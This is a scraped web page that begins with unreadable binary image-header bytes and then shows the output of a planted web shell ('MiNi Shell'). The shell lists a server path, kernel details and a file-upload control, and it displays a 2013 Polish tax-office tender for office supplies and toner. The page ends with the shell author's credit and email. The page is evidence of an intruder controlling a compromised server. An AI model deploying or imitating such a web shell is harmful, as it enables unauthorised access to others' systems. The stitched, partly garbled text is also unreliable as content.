JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130206/49824-N-2013.html

<p class="kh_header"><b>Lublin: Dostawa materiałów biurowych oraz materiałów eksploatacyjnych do drukarek dla Pierwszego Urzędu Skarbowego w Lublinie</b><br>
<b>Numer ogłoszenia: 49824 - 2013; data zamieszczenia: 06.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pierwszy Urząd Skarbowy w Lublinie , ul. Sądowa 5, 20-027 Lublin, woj. lubelskie, tel. (081) 46 42 310, 46 42 327, faks (081) 46 42 312.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pus.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych oraz materiałów eksploatacyjnych do drukarek dla Pierwszego Urzędu Skarbowego w Lublinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I - ZESTAWIENIE A:

1. Cienkopis czarny - cienkopis typu Stabilo Point 88, kolor pisania: czarny -120 szt.
2. Cienkopis czerwony - cienkopis typu Stabilo Point 88, kolor pisania: czerwony -30 szt.
3. Cienkopis zielony - cienkopis typu Stabilo Point 88, kolor pisania: zielony - 30 szt.
4. Długopis niebieski - długopis do wkładów typu Zenith - automatyczny, wymienny wkład, kolor pisania: niebieski - 200 szt.
5. Długopis niebieski - długopis do wkładów F-145 STAR Minen - przeźroczysty korpus, gumowy uchwyt w kolorze pisania, wymienny wkład, kolor pisania niebieski - 150 szt.
6. Flamaster czarny - nieblaknący, nietoksyczny, kolor pisania: czarny - 100 szt.
7. Flamaster czerwony - nieblaknący, nietoksyczny, kolor pisania: czerwony - 100 szt.
8. Grafity do ołówków - wkłady grafitowe do ołówków
wkłady do ołówków automatycznych: klasa twardości HB, grubość 0,5 mm, długość 60mm, w opakowaniu plastikowym, opakowanie 12 szt. - 20 op.
9. Gumka do ścierania - wykonana z tworzywa sztucznego, do ścierania ołówka, wymiary co najmniej 30mm x 16 mm x 9mm - 50 szt.
10. Klej biurowy - klej w sztyfcie, do klejenia papieru, niskotoksyczny, bez rozpuszczlników, zmywalny wodą, opakowanie min. 8 g. - 20 szt.
11. Korektor w piórze - korektor w piórze z metalową końcówką, pojemność min. 8 ml - 72 szt.
12. Linijka 30 cm - wykonana z przeźroczystego polistyrenu, skalowanie w centymetrach, podziałka 1 x 1 mm, długość 30 cm - 30 szt.
13. Notesy samoprzylepne - bloczek 100 kartkowy,  rozmiar ok. 76 x 76mm, kartki w żółtym kolorze - 120 bloczków
14. Nożyczki - ostrze ze stali nierdzewnej, rękojeść z niełamliwego plastiku, długość min. 24 cm - 30 szt.
15. Nożyczki - ostrze ze stali nierdzewnej, rękojeść z niełamliwego plastiku, długość min. 15 cm - 20 szt.
16. Ołówek w długopisie - ołówek automatyczny wyposażony w gumowy uchwyt, klips, gumkę do ścierania, grubość rysika 0,5 mm - 50 szt.
17. Ołówek z gumką - ołówek drewniany z  klejonym grafitem, twardość HB, z gumką - 180 szt.
18. Papier A3 - format A3, gramatura 80g/m2, białość: CIE 161, opakowanie: ryza 500 arkuszy - 100 ryz
19. Plastelina - kolor: szary - 1 kg
20. Segregator 50/A4 - format: A4, szerokość grzbietu: 50 mm, na dolnych krawędziach metalowe okucia, wymienna etykieta opisowa, okleina zewnętrzna: folia, wzmocniony otwór na palec, kolor: mix kolorów - 240 szt.
21. Segregator 75/A4 - format: A4, szerokość grzbietu: 75 mm, na dolnych krawędziach metalowe okucia, wymienna etykieta opisowa, okleina zewnętrzna: folia, wzmocniony otwór na palec, kolor: mix kolorów - 2000 szt.
22. Segregator 75/A5 - format: A5, szerokość grzbietu: 75 mm, na dolnych krawędziach metalowe okucia, wymienna etykieta opisowa, okleina zewnętrzna: folia, wzmocniony otwór na palec, kolor: mix kolorów - 72 szt.
23. Skoroszyt plastikowy A4 - format A4, przeźroczysta przednia okładka, kolorowa tylna okładka, wymienny pasek opisowy wykonany z papieru, kolor: mix kolorów - 200 szt.
24. Skoroszyt plastikowy zawieszany A4 - format A4, przeźroczysta przednia okładka, kolorowa tylna okładka, wymienny pasek opisowy wykonany z papieru, boczna perforacja umożliwiająca wpięcie do segregatora, kolor mix kolorów - 200 szt.
25. Skoroszyty oczkowe ? - format A4, wykonany z kartonu min. 250g/m2, kolor: biały - 1000 szt.
26. Skoroszyty oczkowe pełne - format A4, wykonany z kartonu min. 250g/m2, kolor: biały - 2000 szt.
27. Skoroszyty zawieszane pełne - format: A4, wykonany z kartonu min. 250g/m2, kolor: biały - 1000 szt.
28. Taśma pakowa - jednostronnie klejona na taśmie, rozmiar 48 mm x 60 m, klej: kauczukowy, kolor: brązowy - 10 szt.
29. Temperówka metalowa - wykonana ze stopu magnezu, pojedyncza, z ostrzem metalowym mocowanym wkrętem - 30 szt.
30. Toner do kserokopiarki Ricoh Priport JP3000 - fabrycznie nowy, nie regenerowany - 6 szt.
31. Tusz do stempli czarny - tusz do stempli samotuszujących z gumową lub polimerową płytką stemplującą kolor czarny, buteleczka min. 25ml - 24 butelki
32. Tusz do stempli czerwony - tusz do stempli samotuszujących z gumową lub polimerową płytką stemplującą kolor czerwony, buteleczka min. 25ml - 180 butelek
33. Wąsy do skoroszytów - pasek skoroszytowy z metalowymi wąsami i listewką dociskową - 3000 szt.
34. Wkłady do długopisów typu ZENITH - wkłady do długopisów typu ZENITH, kolor pisania: niebieski - 100 szt.
35. Zakreślacz niebieski - do znaczenia tekstu na każdym rodzaju papieru, ze skuwką, tusz nietoksyczny, nie rozmazujący tekstu, grubość linii pisania 1-5 mm, kolor pisania: niebieski - 48 szt.
36. Zakreślacz pomarańczowy - do znaczenia tekstu na każdym rodzaju papieru, ze skuwką, tusz nietoksyczny, nie rozmazujący tekstu, grubość linii pisania 1-5 mm, kolor pisania: pomarańczowy - 48 szt.
37. Zakreślacz różowy - do znaczenia tekstu na każdym rodzaju papieru, ze skuwką, tusz nietoksyczny, nie rozmazujący tekstu, grubość linii pisania 1-5 mm, kolor pisania: różowy - 24 szt.
38. Zakreślacz zielony - do znaczenia tekstu na każdym rodzaju papieru, ze skuwką, tusz nietoksyczny, nie rozmazujący tekstu, grubość linii pisania 1-5 mm, kolor pisania: zielony - 48 szt.
39. Zakreślacz żółty - do znaczenia tekstu na każdym rodzaju papieru, ze skuwką, tusz nietoksyczny, nie rozmazujący tekstu, grubość linii pisania 1-5 mm, kolor pisania: żółty - 96 szt.
40. Zszywacz - do zszywania minimum 30 kartek o gramaturze 80g/m2, na zszywki 24/6 i 26/6, system ładowania zszywek od góry, głębokość zszywania 67 mm, możliwość zginania zszywek do wewnątrz i na zewnątrz - 20 szt.
41. Zszywki 24/6 - zszywki stalowe, rozmiar 24/6, opakowanie 1000 sztuk - 500 op.

CZĘŚĆ I - ZESTAWIENIE B:

1. Długopis niebieski - długopis do wkładów typu Zenith - automatyczny, wymienny wkład, kolor pisania: niebieski - 50 szt.
2. Koperty C4 HK RBD bez okna - format C4 - 229 x 324 x 38 mm, z paskiem samoprzylepnym, klejone na krótszym boku, bez okna - 500 szt.
3. Segregator 75/A4 - format: A4, szerokość grzbietu: 75 mm, na dolnych krawędziach metalowe okucia, wymienna etykieta opisowa, okleina zewnętrzna: folia, wzmocniony otwór na palec, kolor: mix kolorów - 400 szt.
4. Skoroszyt kartonowy - format A4, wykonany z kartonu min. 250g/m2, kolor: biały - 500 szt.
5. Zszywki 24/6 - zszywki stalowe, rozmiar 24/6, opakowanie 1000 sztuk - 100 op.

CZĘŚĆ II:

1. Toner do drukarki HP LJ M603 - toner do drukarki HP LJ M603, oryginalny, fabrycznie nowy, wydajność min. 24000 stron, opakowanie pojedyncze lub dwupak - 10 szt.
2. Toner do drukarki HP LJ 4050 - toner do drukarki HP LJ 4050, oryginalny, fabrycznie nowy, wydajność min. 10000 stron, opakowanie pojedyncze lub dwupak - 6 szt.
3. Toner do drukarki HP LJ 4250 - toner do drukarki HP LJ 4250, oryginalny, fabrycznie nowy, wydajność min. 20000 stron, opakowanie pojedyncze lub dwupak - 10 szt.
4. Toner do drukarki HP LJ P4515 - toner do drukarki HP LJ 4515, oryginalny, fabrycznie nowy, wydajność min. 24000 stron, opakowanie pojedyncze lub dwupak - 18 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.19.95.00-5, 30.19.21.25-3, 30.19.21.32-5, 30.19.21.21-5, 30.19.21.00-2, 24.91.00.00-6, 30.19.76.30-1, 30.19.76.44-2, 22.85.10.00-0, 22.60.00.00-6, 30.12.51.20-8, 30.19.71.00-7, 30.19.92.30-1, 30.19.73.20-5, 44.42.42.00-0, 30.19.21.31-8, 39.24.12.00-5, 22.81.61.00-4, 30.19.29.30-9, 24.91.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Do oferty składanej na Część 2 - dostawę materiałów eksploatacyjnych do drukarek:
- raporty z testów wydajności przeprowadzonych zgodnie z normą ISO/IEC 19752 dla tonerów monochromatycznych lub inną równoważną - wydane przez niezależny podmiot posiadający stosowną akredytację pod kątem wymogów opisanych norm, uprawniony do kontroli jakości potwierdzający oferowaną wydajność asortymentu.
- certyfikaty potwierdzające, że proces produkcji zaproponowanego asortymentu przebiega zgodnie z normami ISO 9001 i ISO 14001 lub równoważnymi - wydane przez niezależny podmiot posiadający stosowną akredytację pod kątem wymogów opisanych norm, uprawniony do kontroli jakości.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany przez osobę lub osoby uprawnione formularz ofertowy wg podanego wzoru
2. Wypełniony i podpisany przez osobę lub osoby uprawnione formularz cenowy do części zamówienia na którą jest składana oferta według podanego wzoru
3. Pełnomocnictwo ustanowione do reprezentowania wykonawcy ubiegającego się o udzielenie zamówienia publicznego, o ile ofertę składa pełnomocnik.
4. Aktualny dokument lub dokumenty pozwalające ustalić osobę lub osoby uprawnione do zaciągania zobowiązań w imieniu wykonawcy, np. odpis z właściwego rejestru, zaświadczenie o wpisie do ewidencji działalności gospodarczej, statut spółki itp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pus.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pierwszy Urząd Skarbowy w Lublinie, ul. Sądowa 5, 20-027 Lublin, pokój 214..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2013 godzina 10:00, miejsce: Sekretariat Pierwszego Urzędu Skarbowego w Lublinie, ul. Sądowa 5, 20-027 Lublin, pokój 200 (II piętro). Sekretariat pracuje od poniedziałku do piątku w godz. od 07.15 do 15.15..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com